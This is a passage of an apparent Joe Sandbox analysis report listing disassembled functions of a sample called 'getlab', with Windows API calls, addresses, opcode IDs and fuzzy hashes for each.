                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                          • String ID: =Y
                                                                          • API String ID: 730355536-2624468338
                                                                          • Opcode ID: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                                          • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                          • Opcode Fuzzy Hash: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                                          • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                          APIs
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00457E48
                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00457E69
                                                                          • CloseHandle.KERNEL32(?,00457E9C), ref: 00457E8F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                          • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                          • API String ID: 2573145106-3235461205
                                                                          • Opcode ID: fd83349507a0981e80b71893faadad776893e27a60c3cb1bdbbb378314d18f26
                                                                          • Instruction ID: 364c7453444e38e17299d149b0285d9f966ded63b706bec2a35302b816cfa9f1
                                                                          • Opcode Fuzzy Hash: fd83349507a0981e80b71893faadad776893e27a60c3cb1bdbbb378314d18f26
                                                                          • Instruction Fuzzy Hash: 88018F71608304AFD711EBA99D03A2E73A9EB49715F6040B6FC10E72D3DA389D048619
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA68,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9BA
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C0
                                                                          • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                          • String ID: ChangeWindowMessageFilter$user32.dll
                                                                          • API String ID: 3478007392-2498399450
                                                                          • Opcode ID: e1b8650f68b4f5373240c16350828cc36d4525f286b48015e4a1be8ef0f4b549
                                                                          • Instruction ID: 012688e8468ec3177747178b84a01981fc81215c8fc8f9e453d059575ed0bd59
                                                                          • Opcode Fuzzy Hash: e1b8650f68b4f5373240c16350828cc36d4525f286b48015e4a1be8ef0f4b549
                                                                          • Instruction Fuzzy Hash: B5E0ECA1740314EAEA203B66BE8AF573558E724B19F54003BF100A51F2C7BC1C80CA9E
                                                                          APIs
                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00477630
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477727,0049C0A4,00000000), ref: 00477643
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477649
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                          • String ID: AllowSetForegroundWindow$user32.dll
                                                                          • API String ID: 1782028327-3855017861
                                                                          • Opcode ID: f9c0aa6575de5325031961dc8c28253599d1abb86677e5186b48b355b3ec359b
                                                                          • Instruction ID: 000833d094a070652a329d30f0dc0cedfc4963abb7563544beb27e38e0473342
                                                                          • Opcode Fuzzy Hash: f9c0aa6575de5325031961dc8c28253599d1abb86677e5186b48b355b3ec359b
                                                                          • Instruction Fuzzy Hash: 8DD05E90249B02A9D90073B94C46F6F224C8A90B68790843B7408F218ECA3CDC00AA3C
                                                                          APIs
                                                                          • BeginPaint.USER32(00000000,?), ref: 00416C4A
                                                                          • SaveDC.GDI32(?), ref: 00416C7B
                                                                          • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D3D), ref: 00416CDC
                                                                          • RestoreDC.GDI32(?,?), ref: 00416D03
                                                                          • EndPaint.USER32(00000000,?,00416D44,00000000,00416D3D), ref: 00416D37
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                          • String ID:
                                                                          • API String ID: 3808407030-0
                                                                          • Opcode ID: b6c8991bbe38a25b063fe02cbbd384aaa1ab048ef0fa4b5957116aa5db27c33c
                                                                          • Instruction ID: a024d51d8e1917fcb77b8775c892227abb36bb6ea51d3f2ecd71d44c14df9e09
                                                                          • Opcode Fuzzy Hash: b6c8991bbe38a25b063fe02cbbd384aaa1ab048ef0fa4b5957116aa5db27c33c
                                                                          • Instruction Fuzzy Hash: 90414170A04244AFCB04DBA9C595FAA77F5FF48304F1640AAE8459B362D778DD81CF54
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 76268f3067fd7e5b2c462dbffcea77bb187ec6f22ea95bd0c2474c45d8462d54
                                                                          • Instruction ID: 35d93ad14ebc553eed2a21e9b47c67a907fa477780373b58b871235641bd8dc8
                                                                          • Opcode Fuzzy Hash: 76268f3067fd7e5b2c462dbffcea77bb187ec6f22ea95bd0c2474c45d8462d54
                                                                          • Instruction Fuzzy Hash: B23132746057409FC320EB69C584BABB7E8AF89714F04891EF9D9C7751C638EC818B19
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429800
                                                                          • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 0042982F
                                                                          • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 0042984B
                                                                          • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 00429876
                                                                          • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 00429894
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: 9f4218a80dfb6ea41a935cea72b52cc504d621f6de5a3555e5000c6e6653befd
                                                                          • Instruction ID: c6a16a7b88e0b18788f8573a4e1e1ff521d0234e697c82a38616540cbd285451
                                                                          • Opcode Fuzzy Hash: 9f4218a80dfb6ea41a935cea72b52cc504d621f6de5a3555e5000c6e6653befd
                                                                          • Instruction Fuzzy Hash: 0621AF707507057AE710FB67DC82F8B7AECDB41708F54483EB905AB6D2DBB8AD418618
                                                                          APIs
                                                                          • GetSystemMetrics.USER32(0000000B), ref: 0041BBC2
                                                                          • GetSystemMetrics.USER32(0000000C), ref: 0041BBCC
                                                                          • 73A1A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC0A
                                                                          • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD75,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC51
                                                                          • DeleteObject.GDI32(00000000), ref: 0041BC92
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: MetricsSystem$A26310A570DeleteObject
                                                                          • String ID:
                                                                          • API String ID: 4277397052-0
                                                                          • Opcode ID: e18963905fbda8c1d4957780915d0687961bfe8337bc9852c69d647676f2e28b
                                                                          • Instruction ID: 58bffdd5ee351b83518612b46dbf543796c6efca4902a0296a584a1adfede215
                                                                          • Opcode Fuzzy Hash: e18963905fbda8c1d4957780915d0687961bfe8337bc9852c69d647676f2e28b
                                                                          • Instruction Fuzzy Hash: E2317F70E00208EFDB04DFA5C942AAEB7F5EB48704F21856AF514EB381D7789E80DB95
                                                                          APIs
                                                                            • Part of subcall function 0045CE6C: SetLastError.KERNEL32(00000057,00000000,0045CF38,?,?,?,?,00000000), ref: 0045CED7
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00473494,?,?,0049C1D0,00000000), ref: 0047344D
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00473494,?,?,0049C1D0,00000000), ref: 00473463
                                                                          Strings
                                                                          • Failed to set permissions on registry key (%d)., xrefs: 00473474
                                                                          • Could not set permissions on the registry key because it currently does not exist., xrefs: 00473457
                                                                          • Setting permissions on registry key: %s\%s, xrefs: 00473412
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                          • API String ID: 1452528299-4018462623
                                                                          • Opcode ID: c2b4e85895e31eb7a4579faef75fdd198930d34150e3eae1e6804dec0b8ec56e
                                                                          • Instruction ID: 1dcd38469e34a8f7cdaf58011d69bd772563d378ec45d4c1a9cd481a7780d06e
                                                                          • Opcode Fuzzy Hash: c2b4e85895e31eb7a4579faef75fdd198930d34150e3eae1e6804dec0b8ec56e
                                                                          • Instruction Fuzzy Hash: 9221B370A042445FCB05DFAAC8816EEBBE8DF49319F50817AE448E7392D77C5E058BAD
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                          • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                          • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$AllocString
                                                                          • String ID:
                                                                          • API String ID: 262959230-0
                                                                          • Opcode ID: fdbd74c082f9815823b504bab77549cef434610d295dd08879ffad668e8b5e0c
                                                                          • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                          • Opcode Fuzzy Hash: fdbd74c082f9815823b504bab77549cef434610d295dd08879ffad668e8b5e0c
                                                                          • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                          APIs
                                                                          • 73A18830.GDI32(00000000,00000000,00000000), ref: 00414411
                                                                          • 73A122A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414419
                                                                          • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041442D
                                                                          • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414433
                                                                          • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041443E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: A122A18830$A480
                                                                          • String ID:
                                                                          • API String ID: 3325508737-0
                                                                          • Opcode ID: 2e378a44b9d760f9e5f1bf7c9b236df4e5f96ed4aa47b9fb48d5ba9b1bbdbb58
                                                                          • Instruction ID: 53d1df8a90047df028643ee63be254e951aa3f987763a81c259c8cb4a1af4cbb
                                                                          • Opcode Fuzzy Hash: 2e378a44b9d760f9e5f1bf7c9b236df4e5f96ed4aa47b9fb48d5ba9b1bbdbb58
                                                                          • Instruction Fuzzy Hash: 7101D43520C3806AE600A63D8C85A9F6BDD9FC6314F05446EF484DB282C979C801C761
                                                                          APIs
                                                                            • Part of subcall function 0041F06C: GetActiveWindow.USER32 ref: 0041F06F
                                                                            • Part of subcall function 0041F06C: GetCurrentThreadId.KERNEL32 ref: 0041F084
                                                                            • Part of subcall function 0041F06C: 73A25940.USER32(00000000,Function_0001F048), ref: 0041F08A
                                                                            • Part of subcall function 004231A0: GetSystemMetrics.USER32(00000000), ref: 004231A2
                                                                          • OffsetRect.USER32(?,?,?), ref: 00424DC1
                                                                          • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E84
                                                                          • OffsetRect.USER32(?,?,?), ref: 00424E95
                                                                            • Part of subcall function 0042355C: GetCurrentThreadId.KERNEL32 ref: 00423571
                                                                            • Part of subcall function 0042355C: SetWindowsHookExA.USER32(00000003,00423518,00000000,00000000), ref: 00423581
                                                                            • Part of subcall function 0042355C: CreateThread.KERNEL32(00000000,000003E8,004234C8,00000000,00000000), ref: 004235A5
                                                                            • Part of subcall function 00424B24: SetTimer.USER32(00000000,00000001,?,004234AC), ref: 00424B3F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$CurrentOffsetRect$A25940ActiveCreateDrawHookMetricsSystemTextTimerWindowWindows
                                                                          • String ID: nLB
                                                                          • API String ID: 1906964682-2031493005
                                                                          • Opcode ID: d69f4dabb7a698d4e2161d5678524c276ca36ddb1998852898fe681b10175c4d
                                                                          • Instruction ID: 6ccba84303d4583ac65c185f09da03f8435108134aba783506c2f58cc8f90ba1
                                                                          • Opcode Fuzzy Hash: d69f4dabb7a698d4e2161d5678524c276ca36ddb1998852898fe681b10175c4d
                                                                          • Instruction Fuzzy Hash: A7812871A00218CFDB14DFA8D884ADEBBF4FF88314F51416AE905AB296E778AD45CF44
                                                                          APIs
                                                                          • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00406FF3
                                                                          • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040706D
                                                                          • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070C5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Enum$NameOpenResourceUniversal
                                                                          • String ID: Z
                                                                          • API String ID: 3604996873-1505515367
                                                                          • Opcode ID: 0cda032a99fccbc67731b5396545ffd3d82a8b59ae0714c8f86b613c94d89fe8
                                                                          • Instruction ID: 6c201072c7e19ab920663406aa1001a3a7646b20d706545eb94c2f0a958ae389
                                                                          • Opcode Fuzzy Hash: 0cda032a99fccbc67731b5396545ffd3d82a8b59ae0714c8f86b613c94d89fe8
                                                                          • Instruction Fuzzy Hash: 17517070E04208ABDB11DF55C941A9EBBF9EF49304F1481BAE500BB3D1D778AE458B6A
                                                                          APIs
                                                                          • SetRectEmpty.USER32(?), ref: 0044D046
                                                                          • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D071
                                                                          • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D0F9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: DrawText$EmptyRect
                                                                          • String ID:
                                                                          • API String ID: 182455014-2867612384
                                                                          • Opcode ID: aa4c93a2d6761cb4316e3b9f58fd36adaf3be60b4be49a56ecc8a50fb57c6bd0
                                                                          • Instruction ID: 2c01bf535b7fc2f64207dbeae616ffe24efc4250a83762b1f7dac36c1304b9fc
                                                                          • Opcode Fuzzy Hash: aa4c93a2d6761cb4316e3b9f58fd36adaf3be60b4be49a56ecc8a50fb57c6bd0
                                                                          • Instruction Fuzzy Hash: 6C517171E00248AFDB11DFA9C885BDEBBF8AF49308F14447AE845EB352D7389945CB64
                                                                          APIs
                                                                          • 73A1A570.USER32(00000000,00000000,0042F0C0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EF96
                                                                            • Part of subcall function 0041A1E0: CreateFontIndirectA.GDI32(?), ref: 0041A29F
                                                                          • SelectObject.GDI32(?,00000000), ref: 0042EFB9
                                                                          • 73A1A480.USER32(00000000,?,0042F0A5,00000000,0042F09E,?,00000000,00000000,0042F0C0,?,?,?,?,00000000,00000000,00000000), ref: 0042F098
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: A480A570CreateFontIndirectObjectSelect
                                                                          • String ID: ...\
                                                                          • API String ID: 2998766281-983595016
                                                                          • Opcode ID: aaeb4b64b252ec620ee19bd92df8033ea15f110d648c0c566ea30b5701249572
                                                                          • Instruction ID: 43f07ddd406d3cd78f52d868909731211d08e22d210600ca561f601472f043fe
                                                                          • Opcode Fuzzy Hash: aaeb4b64b252ec620ee19bd92df8033ea15f110d648c0c566ea30b5701249572
                                                                          • Instruction Fuzzy Hash: A6318570B00128ABDB11DF99D841BAEB7F9FB48708F90447BF410A7392C7785E44CA59
                                                                          APIs
                                                                          • GetClassInfoA.USER32(00400000,?,?), ref: 00416477
                                                                          • UnregisterClassA.USER32(?,00400000), ref: 004164A3
                                                                          • RegisterClassA.USER32(?), ref: 004164C6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Class$InfoRegisterUnregister
                                                                          • String ID: @
                                                                          • API String ID: 3749476976-2766056989
                                                                          • Opcode ID: 58713160258ce5f561964bbdae6a2794c8f6f6caf00f6f1604bd66b56dd4b990
                                                                          • Instruction ID: 9d11af1acff112dbe95f15f3a9399eab9f365f4a7252c57533c35fba51c14aa0
                                                                          • Opcode Fuzzy Hash: 58713160258ce5f561964bbdae6a2794c8f6f6caf00f6f1604bd66b56dd4b990
                                                                          • Instruction Fuzzy Hash: 81316F702043409BD720EF68C981B9B77E5AB89308F04457FF949DB392DB39D944CB6A
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,0049806C,00000000,00497812,?,?,00000000,0049B628), ref: 0049778C
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,0049806C,00000000,00497812,?,?,00000000,0049B628), ref: 004977B5
                                                                          • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004977CE
                                                                          Strings
                                                                          Memory Dump Source
